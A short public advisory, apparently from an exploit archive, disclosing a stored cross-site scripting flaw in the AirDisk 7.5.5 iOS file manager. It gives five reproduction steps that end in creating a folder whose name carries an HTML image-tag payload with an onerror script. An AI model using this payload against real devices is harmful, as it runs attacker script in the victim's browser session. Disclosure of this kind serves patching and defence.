AirDisk version 7.5.5 suffers from a persistent cross site scripting vulnerability.
5c2171b386d4185c2d365152bd1f99a0e03692cfe0babd1487055e726dd594e8# Exploit Title: AirDisk 7.5.5 File Manager Stored XSS
# Date: Sep 8, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://apps.apple.com/us/developer/felix-yew/id505904424
# Software Link:
https://apps.apple.com/us/app/airdisk-file-manager/id566530748
# Version: 7.5.5
# Tested on: iPhone ios 15.6
1/ Starting the server ( File Transfer > Wi-fi File Transfer )
2/ Go to browser
3/ Enter the address showing on app eg: http://192.168.1.187:8080
4/ Create a folder with the name: rose'"><img src=x
onerror=alert(document.location)>
5/ Refresh.